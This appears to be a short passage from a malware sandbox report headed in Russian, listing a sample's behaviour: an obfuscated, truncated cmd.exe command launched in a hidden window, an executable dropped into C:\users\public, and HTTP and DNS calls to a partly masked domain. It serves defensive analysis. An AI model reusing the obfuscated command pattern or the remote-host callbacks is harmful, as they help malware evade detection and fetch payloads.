Техническая информация
- '<SYSTEM32>\cmd.exe' CSaZXCajPmjnmq SwVjRhAvjmbiFaw qCuRWDAL & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %jPQkHiVibGjipSB%=QSvcSpINTOfa&&set %iwaYiPb%=p&&set %XfBMDsAsXYiJjk%=o^w&&...
- C:\users\public\125250.exe
- 'sd###er4wer.com':80
- http://sd###er4wer.com/NARK/testv.php?l=##########
- http://www.sd###er4wer.com/NARK/testv.php?l=##########
- DNS ASK sd###er4wer.com
- '<SYSTEM32>\cmd.exe' CSaZXCajPmjnmq SwVjRhAvjmbiFaw qCuRWDAL & %^c^o^m^S^p^E^c^% %^c^o^m^S^p^E^c^% /V /c set %jPQkHiVibGjipSB%=QSvcSpINTOfa&&set %iwaYiPb%=p&&set %XfBMDsAsXYiJjk%=o^w&&...' (со скрытым окном)